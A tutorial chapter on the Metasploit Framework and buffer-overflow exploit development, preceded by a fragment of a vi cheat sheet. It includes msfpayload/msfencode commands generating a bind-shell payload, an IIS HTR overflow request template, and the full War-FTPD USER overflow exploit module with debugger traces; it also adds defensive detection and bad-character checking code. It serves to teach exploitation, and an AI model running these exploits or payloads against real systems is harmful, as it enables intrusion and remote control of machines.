R - replace the character below the cursor 
P - paste after the cursor (here the last deleted character) 
xp - switch two characters 

undo and repeat - 

u - undo the last action 
. - repeat the last action 

cut, copy and paste a line - 

dd - cut the current line 
yy - (yank yank) copy the current line 
p - paste after the current line 
P - paste before the current line 

join two lines - 

J - join two lines 
yyp - duplicate a line 
ddp - switch two lines 


25. Exploits, Metasploit 


Introduction 

In 2003, a new security tool called the Metasploit Framework (MSF) was released to the public. This tool was the first open- 
source and freely available exploit development framework, and in the year following its release MSF rapidly grew to be 
one of the security community's most popular tools. The solid reputation of the framework is due to the efforts of the core 
development team along with external contributors, and their hard work had resulted, at the time this chapter was written, 
in over 45 dependable exploits against many of the most popular operating systems and applications. Released under the 
GNU GPL and the Artistic License, the Metasploit Framework continues to add new exploits and cutting-edge security 
features with every release. 

We will begin this chapter by discussing how to use the Metasploit Framework as an exploitation platform. The focus of this 
section will be the use of msfconsole, the most powerful and flexible of the three available interfaces. Next, the chapter will 
cover one of the most powerful aspects of Metasploit that tends to be overlooked by most users: its ability to significantly 
reduce the amount of time and background knowledge necessary to develop functional exploits. By working through a real- 
world vulnerability against a popular closed-source Web server, the reader will learn how to use the tools and features of 
MSF to quickly build a reliable buffer overflow attack as a stand-alone exploit. The chapter will also explain how to 
integrate an exploit directly into the Metasploit Framework by providing a line-by-line analysis of an integrated exploit 
module. Details as to how the Metasploit engine drives the behind-the-scenes exploitation process will be covered, and 
along the way the reader will come to understand the advantages of exploitation frameworks. 

This text is intended neither for beginners nor for experts. Its aim is to detail the usefulness of the Metasploit project tools 
while bridging the gap between exploitation theory and practice. To get the most out of this chapter, one should have an 
understanding of the theory behind buffer overflows as well as some basic programming experience. 


Using the Metasploit Framework 

The Metasploit Framework described in this chapter (version 2.x) is written in the Perl scripting language and can be run on 
almost any UNIX-like platform, including the Cygwin environment for Windows. (From version 3.0 onward the framework 
was rewritten in Ruby; the concepts and most of the msfconsole command names below carry over to current releases.) The 
framework provides the user with three interfaces: msfcli, msfweb, and msfconsole. The msfcli interface is useful for 
scripting because all exploit options are specified as arguments in a single command-line statement. The msfweb interface 
can be accessed via a Web browser and serves as an excellent medium for vulnerability demonstrations. The msfconsole 
interface is an interactive command-line shell that is the preferred interface for exploit development. 


The msfconsole Help Menu - 

Metasploit Framework Main Console Help 

    ?          Show the main console help 
    cd         Change working directory 
    exit       Exit the console 
    help       Show the main console help 
    info       Display detailed exploit or payload information 
    quit       Exit the console 
    reload     Reload exploits and payloads 
    save       Save configuration to disk 
    setg       Set a global environment variable 
    show       Show available exploits and payloads 
    unsetg     Remove a global environment variable 
    use        Select an exploit by name 
    version    Show console version 


The msfconsole Exploit Listing - 





Retrieving Exploit Information - 



The Exploit Mode Command List - 

Metasploit Framework Exploit Console Help 

    ?          Show the main console help 
    back       Drop back to the main menu 
    cd         Change working directory 
    check      Perform vulnerability check 
    exit       Exit the console 
    exploit    Launch the actual exploit 
    help       Show the main console help 
    info       Display detailed exploit or payload information 
    quit       Exit the console 
    reload     Reload exploits and payloads 
    rexploit   Reload and exploit, for us tester types 
    save       Save configuration to disk 
    set        Set a temporary environment variable 
    setg       Set a global environment variable 
    show       Show options, advanced, payloads, or targets 
    unset      Remove a temporary environment variable 
    unsetg     Remove a global environment variable 
    use        Select an exploit by name 
    version    Show console version 

msf iis40_htr > 







Setting Exploit Options - 


Advanced Options - 


msf iis40_htr > show advanced 
Exploit Options 

Exploit <Msf::Exploit::iis40_htr>: 

msf iis40_htr > 


Setting the Payload - 


msf iis40_htr(win32_bind) > show payloads 

Metasploit Framework Usable Payloads 

    win32_bind                   Windows Bind Shell 
    win32_bind_dllinject         Windows Bind DLL Inject 
    win32_bind_meterpreter       Windows Bind Meterpreter DLL Inject 
    win32_bind_stg               Windows Staged Bind Shell 
    win32_bind_stg_upexec        Windows Staged Bind Upload/Execute 
    win32_bind_vncinject         Windows Bind VNC Server DLL Inject 
    win32_exec                   Windows Execute Command 
    win32_reverse                Windows Reverse Shell 
    win32_reverse_dllinject      Windows Reverse DLL Inject 
    win32_reverse_meterpreter    Windows Reverse Meterpreter DLL Inject 
    win32_reverse_stg            Windows Staged Reverse Shell 
    win32_reverse_stg_upexec     Windows Staged Reverse Upload/Execute 
    win32_reverse_vncinject      Windows Reverse VNC Server Inject 

msf iis40_htr(win32_bind) > set PAYLOAD win32_bind 
PAYLOAD -> win32_bind 

msf iis40_htr(win32_bind) > 



Additional Payload Options - 


msf iis40_htr(win32_bind) > show options 

Exploit and Payload Options 

Exploit:    Name      Default          Description 
  --------  --------  ---------------  ------------------ 
  optional  SSL                        Use SSL 
  required  RHOST     192.168.119.136  The target address 
  required  RPORT     80               The target port 

Payload:    Name      Default  Description 
  --------  --------  -------  ------------------------------------------ 
  required  EXITFUNC  seh      Exit technique: "process", "thread", "seh" 
  required  LPORT     4444     Listening port for bind shell 

Target: Windows NT4 SP5 

msf iis40_htr(win32_bind) > 


Writing Exploits - 

The ability to dynamically handle payload connections is yet another unique Metasploit feature. Traditionally, an external 
program like Netcat must be used to connect to the listening port after the exploit has been triggered. If the payload were 
to create a VNC server on the remote machine, then an external VNC client would be needed to connect to the target 
machine. However, the framework removes the need for outside payload handlers. In the previous example, a connection 
is automatically initiated to the listener on port 4444 of the remote machine after the exploit succeeds. This payload 
handling feature extends to all payloads provided by Metasploit, including advanced shellcode like VNC inject. 


Exploit Development with Metasploit - 



In this section, we will develop a stand-alone exploit for the same vulnerability that was exploited in the previous example. 
Normally, writing an exploit requires an in-depth understanding of the target architecture’s assembly language, detailed 
knowledge of the operating system’s internal structures, and considerable programming skill. 

Using the utilities provided by Metasploit, this process is greatly simplified. The Metasploit project abstracts many of these 
details into a collection of simple, easy-to-use tools. These tools can significantly speed up the exploit development 
timeline and reduce the amount of knowledge necessary to write functional exploit code. In the process of re-creating the 
IIS 4.0 HTR buffer overflow, we will explore the use of these utilities. The following sections cover the exploit development 
process of a simple stack overflow from start to finish. First, the attack vector of the vulnerability is determined. 
Second, the offset of the overflow must be calculated. After deciding on the most reliable control vector, a 
valid return address must be found. Character and size limitations will need to be resolved before selecting a payload. A 
nop sled must be created. Finally, the payload must be selected, generated, and encoded. 

Assume in the following exploit development that the target host runs the Microsoft Internet Information Server (IIS) 4.0 
Web server on Windows NT4 Service Pack 5, and that the system architecture is based around a 32-bit x86 processor. 


Determining the Attack Vector - 

An attack vector is the means by which an attacker gains access to a system to deliver a specially crafted payload. This 
payload can contain arbitrary code that gets executed on the targeted system. 

The first step in writing an exploit is to determine the specific attack vector against the target host. Because 
Microsoft's IIS Web server is a closed-source application, we must rely on security advisories and attempt to gather as 
much information as possible. 

The vulnerability is a buffer overflow in Internet Information Server (IIS) 4.0 that was first reported by eEye in 
www.eeye.com/html/research/advisories/AD19990608.html. The eEye advisory explains that an overflow occurs when a page 
with an extremely long filename and an .htr file extension is requested from the server. When IIS receives a file 
request, it passes the filename to the ISM dynamically linked library (DLL) for processing. 

Because neither the IIS server nor the ISM DLL performs bounds checking on the length of the filename, it is possible to 
send a filename long enough to overflow a buffer in a vulnerable function and overwrite the return address. By hijacking 
the flow of execution in the ISM DLL, and subsequently the inetinfo.exe process, the attacker can direct the system to 
execute the payload. Armed with the details of how to trigger the overflow, we must determine how to send a long filename 
to the IIS server. A standard request for a Web page consists of a GET or POST directive, the path and filename of the 
page being requested, and HTTP protocol information. The request is terminated with two newline and carriage return 
combinations (ASCII characters 10 and 13, respectively). The following example shows a GET request for the index.html 
page using the HTTP 1.0 protocol. 

GET /index.html HTTP/1.0\r\n\r\n 

According to the advisory, the filename must be extremely long and possess the .htr file extension. The following is an 
idea of what the attack request would look like: 

GET /extremelylargestringofcharactersthatgoesonandon.htr HTTP/1.0\r\n\r\n 

Although the preceding request is too short to trigger the overflow, it serves as an excellent template of our attack 
vector. In the next section, we determine the exact length needed to overwrite the return address. 
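As an added example that is not part of the original notes, the following Ruby checks request lines for the shape of the HTR attack vector just described, the way a log monitor or a reverse proxy in front of IIS might. The length threshold HTR_PATH_LIMIT and every sample request are constructed for illustration and do not come from the eEye advisory.

```ruby
# Added example, not part of the original notes: a checker for the HTR attack
# vector described above, as a log monitor or reverse proxy in front of IIS
# might apply it. It parses the HTTP request line and flags requests for a
# .htr resource whose filename is implausibly long. HTR_PATH_LIMIT is an
# assumed threshold chosen for illustration, not a figure from the advisory.

HTR_PATH_LIMIT = 255

# Parse "METHOD SP PATH SP HTTP/major.minor"; returns nil when malformed.
def parse_request_line(line)
  m = %r{\A(GET|POST|HEAD)\s+(\S+)\s+HTTP/(\d\.\d)\s*\z}.match(line.strip)
  return nil unless m
  path = m[2]
  # Extension of the requested file, ignoring any query string.
  ext = File.extname(path.split('?', 2).first).downcase
  { method: m[1], path: path, version: m[3], ext: ext }
end

# Verdict for one request line: nil (nothing to report) or a reason symbol.
def htr_request_verdict(line)
  req = parse_request_line(line)
  return :malformed unless req
  return nil unless req[:ext] == '.htr'
  return :oversized_htr_path if req[:path].bytesize > HTR_PATH_LIMIT
  # A filename should be printable ASCII; an overflow buffer carrying code is not.
  return :binary_in_htr_path if req[:path].bytes.any? { |b| b < 0x20 || b > 0x7e }
  nil
end

# Scan many lines; returns [index, verdict] for each line worth reporting.
def scan_requests(lines)
  lines.each_with_index
       .map { |line, i| [i, htr_request_verdict(line)] }
       .reject { |_, verdict| verdict.nil? }
end

# Constructed sample traffic: an ordinary page, an ordinary short .htr
# request, an overlong .htr filename shaped like the template above, and a
# line that is not HTTP at all.
SAMPLE_REQUESTS = [
  'GET /index.html HTTP/1.0',
  'GET /default.htr HTTP/1.0',
  "GET /#{'a' * 3000}.htr HTTP/1.0",
  'USER anonymous',
].freeze

if __FILE__ == $0
  scan_requests(SAMPLE_REQUESTS).each { |i, v| puts "request #{i}: #{v}" }
end
```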


Listing Available Payloads - 

Administrator@nothingbutfat ~/framework 
$ ./msfpayload -h 

Usage: ./msfpayload <payload> [var=val] <S|C|P|R> 

Payloads: 

  bsd_ia32_bind                  BSD IA32 Bind Shell 
  bsd_ia32_bind_stg              BSD IA32 Staged Bind Shell 
  bsd_ia32_exec                  BSD IA32 Execute Command 
  bsd_ia32_findrecv              BSD IA32 Recv Tag Findsock Shell 
  bsd_ia32_findrecv_stg          BSD IA32 Staged Findsock Shell 
  bsd_ia32_findsock              BSD IA32 SrcPort Findsock Shell 
  bsd_ia32_reverse               BSD IA32 Reverse Shell 
  bsd_ia32_reverse_stg           BSD IA32 Staged Reverse Shell 
  bsd_sparc_bind                 BSD SPARC Bind Shell 
  bsd_sparc_reverse              BSD SPARC Reverse Shell 
  bsdi_ia32_bind                 BSDi IA32 Bind Shell 
  bsdi_ia32_bind_stg             BSDi IA32 Staged Bind Shell 
  bsdi_ia32_findsock             BSDi IA32 SrcPort Findsock Shell 
  bsdi_ia32_reverse              BSDi IA32 Reverse Shell 
  bsdi_ia32_reverse_stg          BSDi IA32 Staged Reverse Shell 
  cmd_generic                    Arbitrary Command 
  cmd_irix_bind                  IRIX Inetd Bind Shell 
  cmd_sol_bind                   Solaris Inetd Bind Shell 
  cmd_unix_reverse               Unix Telnet Piping Reverse Shell 
  cmd_unix_reverse_bash          Unix /dev/tcp Piping Reverse Shell 
  cmd_unix_reverse_cross         Unix Telnet Piping Reverse Shell 
  cmd_unix_reverse_nss           Unix Spaceless Telnet Piping Reverse Shell 
  generic_sparc_execve           BSD/Linux/Solaris SPARC Execute Shell 
  irix_mips_execve               IRIX MIPS Execute Shell 
  linux_ia32_adduser             Linux IA32 Add User 
  linux_ia32_bind                Linux IA32 Bind Shell 
  linux_ia32_bind_stg            Linux IA32 Staged Bind Shell 
  linux_ia32_exec                Linux IA32 Execute Command 
  linux_ia32_findrecv            Linux IA32 Recv Tag Findsock Shell 
  linux_ia32_findrecv_stg        Linux IA32 Staged Findsock Shell 
  linux_ia32_findsock            Linux IA32 SrcPort Findsock Shell 
  linux_ia32_reverse             Linux IA32 Reverse Shell 
  linux_ia32_reverse_impurity    Linux IA32 Reverse Impurity Upload/Execute 
  linux_ia32_reverse_stg         Linux IA32 Staged Reverse Shell 
  linux_ia32_reverse_udp         Linux IA32 Reverse UDP Shell 
  linux_sparc_bind               Linux SPARC Bind Shell 
  linux_sparc_reverse            Linux SPARC Reverse Shell 
  osx_ppc_bind                   Mac OS X PPC Bind Shell 
  osx_ppc_bind_stg               Mac OS X PPC Staged Bind Shell 
  osx_ppc_findrecv_peek_stg      Mac OS X PPC Staged Find Recv Peek Shell 
  osx_ppc_findrecv_stg           Mac OS X PPC Staged Find Recv Shell 
  osx_ppc_reverse                Mac OS X PPC Reverse Shell 
  osx_ppc_reverse_nf_stg         Mac OS X PPC Staged Reverse Null-Free Shell 
  osx_ppc_reverse_stg            Mac OS X PPC Staged Reverse Shell 
  solaris_ia32_bind              Solaris IA32 Bind Shell 
  solaris_ia32_findsock          Solaris IA32 SrcPort Findsock Shell 
  solaris_ia32_reverse           Solaris IA32 Reverse Shell 
  solaris_sparc_bind             Solaris SPARC Bind Shell 
  solaris_sparc_reverse          Solaris SPARC Reverse Shell 
  win32_adduser                  Windows Execute net user /ADD 
  win32_bind                     Windows Bind Shell 
  win32_bind_dllinject           Windows Bind DLL Inject 
  win32_bind_meterpreter         Windows Bind Meterpreter DLL Inject 
  win32_bind_stg                 Windows Staged Bind Shell 
  win32_bind_stg_upexec          Windows Staged Bind Upload/Execute 



Generating the Payload - 

Administrator@nothingbutfat ~/framework 
$ ./msfpayload win32_bind LPORT=31337 C 



Administrator@nothingbutfat ~/framework 
$ ./msfpayload win32_bind LPORT=31337 P 



Administrator@nothingbutfat ~/framework 
$ ./msfpayload win32_bind LPORT=31337 R > payload 

Administrator@nothingbutfat ~/framework 
$ ls -l payload 
-rw-r--r--  1 Administ mkpasswd 321 Jan 31 21:50 payload 
msfencode Options - 

Administrator@nothingbutfat ~/framework 
$ ./msfencode -h 

Usage: ./msfencode <options> [var=val] 
Options: 
  -i <file>      Specify the file that contains the raw shellcode 
  -a <arch>      The target CPU architecture for the payload 
  -o <os>        The target operating system for the payload 
  -t <type>      The output type: perl, c, or raw 
  -b <chars>     The characters to avoid: '\x00\xFF' 
  -s <size>      Maximum size of the encoded data 
  -e <encoder>   Try to use this encoder first 
  -n <encoder>   Dump Encoder Information 
  -l             List all available encoders 
msfencode Results - 

Administrator@nothingbutfat ~/framework 
$ ./msfencode -i payload -b '\x00' -e PexAlphaNum 
[*] Using Msf::Encoder::PexAlphaNum with final size of 717 bytes 
[screenshot: msfweb interface with the PAYLOADS and SESSIONS tabs; the module filter is set to os::Win32 and the list shows Windows Bind DLL Inject, Windows Bind Meterpreter DLL Inject, Windows Bind Shell, Windows Bind VNC Server DLL Inject, Windows Execute Command, Windows Execute net user /ADD and Windows Recv Tag Findsock Meterpreter] 

Setting msfweb Payload Options - 
Understanding the Framework - 

The Metasploit Framework is written entirely in object-oriented Perl. All code in the engine and base libraries is 
class-based, and every exploit module in the framework is also class-based. This means that developing an exploit for 
the framework requires writing a class, and this class must conform to the API expected by the Metasploit engine. Before 
delving into the exploit class specification, an exploit developer should gain an understanding of how the engine drives 
the exploitation process; therefore, we take an under-the-hood look at the engine-exploit interaction through each 
stage of the exploitation process. 

The first stage in the exploitation process is the selection of an exploit. An exploit is selected with the use command, 
which causes the engine to instantiate an object based on the exploit class. The instantiation process links the engine 
and the exploit to one another through the framework environment, and also causes the object to make two important 
data structures available to the engine. 

The two data structures are the %info and %advanced structures, which can be queried either by the user to see the 
available options or by the engine to guide it through the exploitation process. When the user queries the exploit to 
determine its required options with the info command, the information is extracted from the %info and %advanced data 
structures. The engine can also use the object information to make decisions: when the user requests a listing of the 
available payloads with the show payloads command, the engine reads the architecture and operating system information 
from %info, so only compatible payloads are displayed to the user. 


Analyzing an Existing Exploit Module - 

Knowing how the engine works will help an exploit developer better understand the structure of the exploit class. Because 
every exploit in the framework must be built around approximately the same structure, a developer need only understand 
and modify one of the existing exploits to create a new exploit module. 

Example - 

Metasploit Module 

package Msf::Exploit::iis40_htr; 
use base "Msf::Exploit"; 
use strict; 
use Pex::Text; 


[screenshot: the Metasploit checkout opened in the IDE. The Project pane lists msf (~/msf) with the folders data, documentation, external, lib, modules, plugins, scripts, spec, test and tools, and the files armitage, CONTRIBUTING.md, COPYING, Gemfile, Gemfile.lock and HACKING. Open editor tabs include db_manager.rb, arguments.rb, dispatcher_shell.rb, core.rb, command_dispatcher.rb, scriptable.rb, credcollect.rb, module_manager.rb, meterpreter.rb and base.rb. The editor shows the cmd_run method:] 

    print_line 
  end 

  # 
  # Executes a script in the context of the meterpreter session. 
  # 
  def cmd_run(*args) 
    if args.length == 0 
      cmd_run_help 
      return true 
    end 

    # Get the script name 
    begin 
      script_name = args.shift 

      # First try it as a Post module if we have access to the 
      # Framework instance.  If we don't, or if no such module exists, 
      # fall back to using the scripting interface. 
      if (msf_loaded? and mod = client.framework.modules.create(script_name)) 
        original_mod = mod 

Debug msfconsole 

[screenshot: msfconsole launched under the IDE's Console Debugger; the console pane shows the Metasploit ASCII-art banner, and the tool window bar shows the Debug, TODO and Changes tabs] 
[screenshot: Console Debugger, Frames pane, Thread 1 [sleep] (pid 583). The break point is hit while the Meterpreter bind_tcp stager is being instantiated; the call stack, innermost frame first:] 

  initialize [handler.rb:75] (Msf::Handler) 
  initialize [bind_tcp.rb:38] (Msf::Handler::BindTcp) 
  initialize [windows.rb:32] (Msf::Payload::Windows) 
  initialize [bind_tcp.rb:59] (Metasploit3) 
  initialize [reflectivedllinject.rb:41] (Msf::Payload::Windows::ReflectiveDllInject) 
  initialize [meterpreter_options.rb:13] (Msf::Sessions::MeterpreterOptions) 
  initialize [meterpreter.rb:39] (Metasploit3) 
  create [module_set.rb:62] (Msf::ModuleSet) 
  create [module_manager.rb:89] (Msf::ModuleManager) 
  exploit_simple [exploit.rb:84] (Msf::Simple::Exploit) 
  exploit_simple [exploit.rb:162] (Msf::Simple::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  run_command [dispatcher_shell.rb:428] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:390] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:384] (Rex::Ui::Text::DispatcherShell) 
  run [shell.rb:200] (Rex::Ui::Text::Shell) 
  msfconsole:148 

Variables pane: 

  Global variables 
  info = Hash (14 elements) 
    'Arch' = Array (1 element) 
    'Author' = Array (3 elements) 
    'Convention' -> sockedi 
    'Description' -> Listen for a connection, Inject the meterpreter server 
    'Handler' -> {Module} Msf::Handler::BindTcp 
    'License' = Array (1 element) 
    'Name' -> Windows Meterpreter (Reflective Injection), Bind TCP Stager 
    'PayloadCompat' = Hash (1 element) 
    'Platform' = Array (1 element) 
    'References' = Array (1 element) 
    'Session' -> {Class} Msf::Sessions::Meterpreter_x86_Win 
    'Stage' = Hash (2 elements) 
    'Stager' = Hash (3 elements) 
    'Version' -> $Revision: 14774 $, $Revision: 15548 $, $Revision: 14 (truncated in the display) 
  Rex::Sync::Event = {Class} Rex::Sync::Event 
Vulnerable Service - 

The vulnerable service we are going to use to explore the internals of Metasploit is the War-FTPD FTP server. The 
Metasploit exploit for War-FTPD can be found in the /modules/exploits/windows/ftp/warftpd_165_user.rb file. 


require 'msf/core' 

class Metasploit3 < Msf::Exploit::Remote 

  Rank = AverageRanking 

  include Msf::Exploit::Remote::Ftp 

  def initialize(info = {}) 
    super(update_info(info, 
      'Name'           => 'War-FTPD 1.65 Username Overflow', 
      'Description'    => %q{ 
          This module exploits a buffer overflow found in the USER command 
          of War-FTPD 1.65. 
      }, 
      'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>', 
      'License'        => BSD_LICENSE, 
      'References'     => 
        [ 
          [ 'CVE', '1999-0256' ], 
        ], 
      'DefaultOptions' => 
        { 
          'EXITFUNC' => 'process' 
        }, 
      'Payload'        => 
        { 
          # The encoded payload must fit in 424 bytes and avoid these bytes. 
          'Space'           => 424, 
          'BadChars'        => "\x00\x0a\x0d\x40", 
          'StackAdjustment' => -3500, 
          'Compat'          => 
            { 
              'ConnectionType' => "-find" 
            } 
        }, 
      'Platform'       => 'win', 
      'Targets'        => 
        [ 
          # Target 0 

          # Target 2 
          [ 
            'Windows XP SP2 English', 
            { 
              'Ret' => 0x71ab9372 # push esp, ret 
            } 
          ], 
        ], 
      'DisclosureDate' => 'Mar 19 1998')) 
  end 

  def exploit 
    connect 

    print_status("Trying target #{target.name}...") 

    # 600 bytes of nops followed by the encoded payload; the selected 
    # target's return address is written at offset 485 as a little-endian 
    # 32-bit value ('V'). 
    buf = make_nops(600) + payload.encoded 
    buf[485, 4] = [ target.ret ].pack('V') 

    # Send the buffer as the argument of a USER command; false means the 
    # reply is not read. 
    send_cmd( ['USER', buf], false ) 

    handler 
    disconnect 
  end 

end 
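As an added example (not Metasploit's own code), the following Ruby implements the check implied by the 'Payload' hash above and by msfencode's -b and -s switches: a candidate payload must fit in 'Space' bytes and contain none of 'BadChars'. The function names payload_violations and fits? and the sample buffers are constructed for this example.

```ruby
# Added example, not Metasploit code: validate a candidate payload against
# the constraints the War-FTPD module declares in its 'Payload' hash
# ('Space' => 424, 'BadChars' => "\x00\x0a\x0d\x40"). msfencode -s and -b
# express the same two limits on the command line. payload_violations and
# fits? are names chosen for this example.

# Constraints copied from the module listing above.
WARFTPD_PAYLOAD_SPEC = { space: 424, badchars: "\x00\x0a\x0d\x40".b }.freeze

# Returns a hash of violations; empty means the buffer satisfies the spec.
#   :too_large => number of bytes beyond :space
#   :badchars  => [[offset, byte], ...] for every forbidden byte, in order
def payload_violations(buf, spec = WARFTPD_PAYLOAD_SPEC)
  bytes     = buf.b
  forbidden = spec[:badchars].bytes
  result    = {}

  over = bytes.bytesize - spec[:space]
  result[:too_large] = over if over > 0

  hits = []
  bytes.each_byte.with_index { |b, i| hits << [i, b] if forbidden.include?(b) }
  result[:badchars] = hits unless hits.empty?
  result
end

def fits?(buf, spec = WARFTPD_PAYLOAD_SPEC)
  payload_violations(buf, spec).empty?
end

# Why these bytes are forbidden for this module: 0x00 terminates C strings,
# and the buffer travels as the argument of an FTP USER line, which the
# server ends at 0x0d 0x0a; the module author also excludes 0x40 ('@').

# Constructed sample buffers; these are not shellcode.
CLEAN_BUF = ("\x90" * 100 + "\xcc" * 24).b               # 124 bytes, all allowed
DIRTY_BUF = ("\x90" * 10 + "\x00" + "A" * 5 + "\x0a@").b  # NUL, LF and '@' present
HUGE_BUF  = ("\x90" * 500).b                              # 76 bytes over Space

if __FILE__ == $0
  [CLEAN_BUF, DIRTY_BUF, HUGE_BUF].each do |b|
    puts "#{b.bytesize} bytes: #{payload_violations(b).inspect}"
  end
end
```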


Set command - 

To see how the parameters required to exploit the vulnerability are initialised, set a break point on the cmd_set 
method declared in the Msf::Ui::Console::CommandDispatcher::Core class. Assuming that the use command has already 
been executed, type set rhost 172.16.134.130 at the msf prompt and hit return. 

The program halts on the break point. Step over the lines of code to see how the entered parameters are stored in the 
active module's datastore. After retrieving the datastore from the active module, the name and the value of the 
parameter are extracted from the argument string before the new parameter is stored in the datastore. 
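Added example, not the framework's code: a miniature datastore and cmd_set that reproduce the behaviour just described (the first argument is the option name, the remaining arguments joined with spaces are the value, keys are stored case-insensitively so that "set rhost" shows up as RHOST, and a change of TARGET drops the cached payload list). MiniDataStore and MiniConsole are names chosen here; the real classes are Msf::ModuleDataStore and Msf::Ui::Console::CommandDispatcher::Core.

```ruby
# Added example, not Metasploit code: a miniature datastore and cmd_set that
# reproduce the behaviour stepped through above. MiniDataStore and MiniConsole
# are stand-ins chosen for this example; the real classes are
# Msf::ModuleDataStore and Msf::Ui::Console::CommandDispatcher::Core.

class MiniDataStore
  def initialize(defaults = {})
    @store = {}
    defaults.each { |k, v| self[k] = v }
  end

  # Option names are case-insensitive at the prompt: "set rhost ..." is what
  # was typed, 'RHOST' is the key the debugger shows in the datastore.
  def []=(name, value)
    @store[name.to_s.upcase] = value.to_s
  end

  def [](name)
    @store[name.to_s.upcase]
  end

  def size
    @store.size
  end

  def to_h
    @store.dup
  end
end

class MiniConsole
  attr_reader :datastore, :cache_payloads

  def initialize
    # A few of the defaults seen in the datastore view.
    @datastore = MiniDataStore.new('RPORT' => '21', 'EXITFUNC' => 'process',
                                   'FTPUSER' => 'anonymous')
    # Stand-in for the payload list built by "show payloads".
    @cache_payloads = [:payload_list_built_for_target_0]
  end

  # The portion of cmd_set followed in the debugger:
  #   name  = args[0]
  #   value = args[1, args.length - 1].join(' ')
  # then the value goes into the active module's datastore, and because a
  # different target may need different payloads, the cached payload list is
  # dropped whenever TARGET changes.
  def cmd_set(*args)
    return :usage if args.length < 2
    name  = args[0]
    value = args[1, args.length - 1].join(' ')
    datastore[name] = value
    @cache_payloads = nil if name.upcase == 'TARGET'
    :ok
  end
end

if __FILE__ == $0
  console = MiniConsole.new
  console.cmd_set('rhost', '172.16.134.130')
  console.cmd_set('TARGET', '2')
  p console.datastore.to_h
  p console.cache_payloads   # nil: the payload list must be rebuilt
end
```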



[screenshot: msfconsole stopped at the break point in cmd_set. Editor tabs: warftpd_165_user.rb, exploit.rb, encoded_payload.rb, module.rb, event_dispatcher.rb. The code shown in core.rb:] 

  # Set the supplied name to the supplied value 
  name  = args[0] 
  value = args[1, args.length - 1].join(' ') 

  # [highlighted line not legible in the screenshot] 

  # Different targets can have different architectures and platforms 
  # so we need to rebuild the payload list whenever the target 
  # changes. 
  @cache_payloads = nil 
end 

Frames pane, Thread 1 [sleep] (pid 433): 

  cmd_set [core.rb:1781] (Msf::Ui::Console::CommandDispatcher::Core) 
  run_command [dispatcher_shell.rb:427] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:389] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:383] (Rex::Ui::Text::DispatcherShell) 
  run [shell.rb:200] (Rex::Ui::Text::Shell) 
  msfconsole:148 

Variables pane: 

  args = Array (2 elements) 
    [0] = "TARGET" 
    [1] = "2" 
  datastore = {Msf::ModuleDataStore} Msf::ModuleDataStore (17 elements) 
    'ConnectTimeout' = "10" 
    'DisablePayloadHandler' = "false" 
    'EnableContextEncoding' = "false" 
    'EXITFUNC' = "process" 
    'FTPDEBUG' = "false" 
    'FTPPASS' = "mozilla@example.com" 
    'FTPTimeout' = "16" 
    'FTPUSER' = "anonymous" 
    'PAYLOAD' = "windows/shell/bind_tcp" 
    'RHOST' = "172.16.134.130" 
    'RPORT' = "21" 
    'SSL' = "false" 
    'SSLVersion' = "SSL3" 
    'TCP::max_send_size' = "0" 
    'TCP::send_delay' = "0" 
    'VERBOSE' = "false" 
    'WfsDelay' = "0" 
Exploit The Target 

The exploit method begins by calling the connect method to connect to the target host. It uses a Metasploit module 
method called print_status, which prints status information to wherever output is being received, to print a connect 
message. Next, the exploit builds the exploit buffer. Finally, the exploit sends the payload buffer by calling the 
send_cmd method to send a USER command; the false argument indicates that we don't care what data is returned. 

The handler method handles the connection from the shell running on the target machine, and the disconnect method 
disconnects us from the vulnerable service. 




[screenshot: Console Debugger stopped inside connect. Frames pane, Thread 1 [sleep] (pid 1227):] 

  connect [tcp.rb:120] (Msf::Exploit::Remote::Tcp) 
  connect [ftp.rb:55] (Msf::Exploit::Remote::Ftp) 
  exploit [warftpd_165_user.rb:86] (Metasploit3) 
  job_run_proc [exploit_driver.rb:206] (Msf::ExploitDriver) 
  run [exploit_driver.rb:166] (Msf::ExploitDriver) 
  exploit_simple [exploit.rb:137] (Msf::Simple::Exploit) 
  exploit_simple [exploit.rb:162] (Msf::Simple::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  run_command [dispatcher_shell.rb:427] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:389] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:383] (Rex::Ui::Text::DispatcherShell) 
  run [shell.rb:200] (Rex::Ui::Text::Shell) 

Variables pane: 

  dossl = false 
  global = true 
  Global variables 
  nsock = {Socket} #<Socket:0x007fc33cc864d0> 
  opts = Empty Hash 
  Rex::Socket::Tcp = {Module} Rex::Socket::Tcp 
  self = {Msf::Modules::Mod6578706c6f69742f77696e646f77732f6674702f776 (truncated in the display) 

Watches pane: No watches 
Send USER command with encoded payload. 

[screenshot: Console Debugger stopped inside raw_send. Frames pane, Thread 1 [sleep] (pid 1227):] 

  raw_send [ftp.rb:303] (Msf::Exploit::Remote::Ftp) 
  send_cmd [ftp.rb:164] (Msf::Exploit::Remote::Ftp) 
  exploit [warftpd_165_user.rb:93] (Metasploit3) 
  job_run_proc [exploit_driver.rb:206] (Msf::ExploitDriver) 
  run [exploit_driver.rb:166] (Msf::ExploitDriver) 
  exploit_simple [exploit.rb:137] (Msf::Simple::Exploit) 
  exploit_simple [exploit.rb:162] (Msf::Simple::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
  run_command [dispatcher_shell.rb:427] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:389] (Rex::Ui::Text::DispatcherShell) 
  run_single [dispatcher_shell.rb:383] (Rex::Ui::Text::DispatcherShell) 
  run [shell.rb:200] (Rex::Ui::Text::Shell) 

Variables pane: 

  (command string) = "USER" followed by the binary exploit buffer (not legible in the display) 
  Global variables 
  nsock = {Socket} #<Socket:0x007fc33d8d4278> 
